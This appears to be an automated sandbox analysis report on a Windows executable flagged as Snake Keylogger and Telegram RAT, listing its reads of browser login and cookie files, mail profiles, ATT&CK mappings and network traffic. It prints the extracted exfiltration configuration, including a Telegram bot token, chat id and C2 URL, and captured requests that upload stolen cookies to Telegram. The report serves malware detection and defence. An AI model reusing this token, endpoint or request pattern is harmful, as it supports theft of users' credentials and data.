Process created: C:\Users\user\Desktop\Nonmerchantable.exe "C:\Users\user\Desktop\Nonmerchantable.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Nonmerchantable.exe	Queries volume information: C:\Users\user\Desktop\Nonmerchantable.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Nonmerchantable.exe

0_2_00403348

Source: C:\Users\user\Desktop\Nonmerchantable.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000005.00000002.4201739054.0000000036161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000005.00000003.3964116665.0000000038882000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4201739054.00000000362DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Nonmerchantable.exe PID: 3236, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Nonmerchantable.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Nonmerchantable.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: C:\Users\user\Desktop\Nonmerchantable.exe

Directory queried: number of queries: 1001

Source: Yara match	File source: 00000005.00000002.4201739054.0000000036268000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Nonmerchantable.exe PID: 3236, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000005.00000002.4201739054.0000000036161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000005.00000003.3964116665.0000000038882000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4201739054.00000000362DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Nonmerchantable.exe PID: 3236, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	12 Masquerading	1 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	1 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	1 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	14 File and Directory Discovery	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	215 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Source: 00000005.00000002.4201739054.0000000036161000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8119135929:AAGv_owQnXugQZM3K0TRex_pZFatMkYkfzY", "Chat_id": "6838630391", "Version": "4.4"}
Source: Nonmerchantable.exe.3236.5.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8119135929:AAGv_owQnXugQZM3K0TRex_pZFatMkYkfzY/sendMessage"}

Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_394487A8 CryptUnprotectData,		5_2_394487A8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_39448EF1 CryptUnprotectData,		5_2_39448EF1

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:50022 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50023 -> 149.154.167.220:443

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 0585F45Dh	5_2_0585F4AC
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 0585F45Dh	5_2_0585F2C0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 0585FC19h	5_2_0585F97A
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 39252D41h	5_2_39252A90
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 39253308h	5_2_39252EF0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3925FBD9h	5_2_3925F930
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3925D069h	5_2_3925CDC0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3925EED1h	5_2_3925EC28
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	5_2_39250040
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	5_2_39250853
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3925F329h	5_2_3925F080
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3925F781h	5_2_3925F4D8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3925E1C9h	5_2_3925DF20
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3925E621h	5_2_3925E378
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3925EA79h	5_2_3925E7D0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 39253308h	5_2_39253236
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3925D4C1h	5_2_3925D218
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3925D919h	5_2_3925D670
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	5_2_39250673
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 39253308h	5_2_39252EEA
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3925DD71h	5_2_3925DAC8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 39440B99h	5_2_394408F0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 39447EB5h	5_2_39447B78
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 39449280h	5_2_39448FB0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3944E816h	5_2_3944E548
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 39440FF1h	5_2_39440D48
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3944C826h	5_2_3944C558
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3944ECA6h	5_2_3944E9D8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3944CCB6h	5_2_3944C9E8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394418A1h	5_2_394415F8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 39441449h	5_2_394411A0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394402E9h	5_2_39440040
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 39443709h	5_2_39443460
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394432B1h	5_2_39443008
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3944DEF6h	5_2_3944DC28
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394462D9h	5_2_39446030
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3944BF06h	5_2_3944BC38
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3944C396h	5_2_3944C0C8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then mov esp, ebp	5_2_3944B081
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 39446733h	5_2_39446488
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 39440741h	5_2_39440498
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3944E386h	5_2_3944E0B8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 39442A01h	5_2_39442758
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394425A9h	5_2_39442300
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3944D5D6h	5_2_3944D308
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3944B5E6h	5_2_3944B318
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394479C9h	5_2_39447720
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394455D1h	5_2_39445328
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 39445E81h	5_2_39445BD8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 39445A29h	5_2_39445780
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3944FA56h	5_2_3944F788
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3944DA66h	5_2_3944D798
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3944BA76h	5_2_3944B7A8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 39442E59h	5_2_39442BB0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 39441CF9h	5_2_39441A50
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3944F136h	5_2_3944EE68
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 39447119h	5_2_39446E70
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3944D146h	5_2_3944CE78
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 39444D21h	5_2_39444A78
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 39446CC1h	5_2_39446A18
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394448C9h	5_2_39444620
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 39447571h	5_2_394472C8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 39445179h	5_2_39444ED0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 3944F5C6h	5_2_3944F2F8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 39442151h	5_2_39441EA8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B6970h	5_2_394B6678
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B8AE8h	5_2_394B87F0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B5E16h	5_2_394B5B48
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B9940h	5_2_394B9648
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B030Eh	5_2_394B0040
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B6E38h	5_2_394B6B40
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B3E26h	5_2_394B3B58
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394BEF50h	5_2_394BEC58
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394BC448h	5_2_394BC150
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394BAC60h	5_2_394BA968
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B0C2Eh	5_2_394B0960
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B8158h	5_2_394B7E60
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B4746h	5_2_394B4478
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394BD768h	5_2_394BD470
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B4BD7h	5_2_394B4908
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B7300h	5_2_394B7008
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394BE0F8h	5_2_394BDE00
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B2BE6h	5_2_394B2918
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394BC910h	5_2_394BC618
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B19DEh	5_2_394B1710
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B9E08h	5_2_394B9B10
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B54F6h	5_2_394B5228
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B8620h	5_2_394B8328
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394BF418h	5_2_394BF120
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B3506h	5_2_394B3238
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394BDC30h	5_2_394BD938
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394BB128h	5_2_394BAE30
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B3996h	5_2_394B36C8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394BE5C0h	5_2_394BE2C8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394BBAB8h	5_2_394BB7C0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B6347h	5_2_394B5FD8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394BA2D0h	5_2_394B9FD8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B079Eh	5_2_394B04D0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B77C8h	5_2_394B74D0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B42B6h	5_2_394B3FE8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394BF8E0h	5_2_394BF5E8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394BCDD8h	5_2_394BCAE0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B22C6h	5_2_394B1FF8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394BB5F0h	5_2_394BB2F8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B10BEh	5_2_394B0DF0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B2756h	5_2_394B2488
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394BBF80h	5_2_394BBC88
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B154Eh	5_2_394B1280
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B9478h	5_2_394B9180
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B5066h	5_2_394B4D98
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B7C90h	5_2_394B7998
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394BEA88h	5_2_394BE790
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B3076h	5_2_394B2DA8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394BD2A0h	5_2_394BCFA8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B1E47h	5_2_394B1BA0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394BA798h	5_2_394BA4A0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B5986h	5_2_394B56B8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394B8FB0h	5_2_394B8CB8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394BFDA8h	5_2_394BFAB0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394F1FE8h	5_2_394F1CF0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394F1658h	5_2_394F1360
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394F0801h	5_2_394F0508
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394F0CC8h	5_2_394F09D0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394F0338h	5_2_394F0040
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394F1B20h	5_2_394F1828
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then jmp 394F1190h	5_2_394F0E98
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	5_2_39514118
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	5_2_39510C78
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	5_2_39510C6A
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	5_2_39510F8E
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	5_2_39514108
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	5_2_39514480

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:910646%0D%0ADate%20and%20Time:%2017/02/2025%20/%2019:23:17%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20910646%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot8119135929:AAGv_owQnXugQZM3K0TRex_pZFatMkYkfzY/sendDocument?chat_id=6838630391&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd4ff311ff9f78Host: api.telegram.orgContent-Length: 7046

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50008 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50005 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50003 -> 142.250.184.238:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50007 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50015 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50011 -> 104.21.32.1:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1sSKJNyS14Ryy6O660oUdagb-t8TRMMQj HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1sSKJNyS14Ryy6O660oUdagb-t8TRMMQj&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
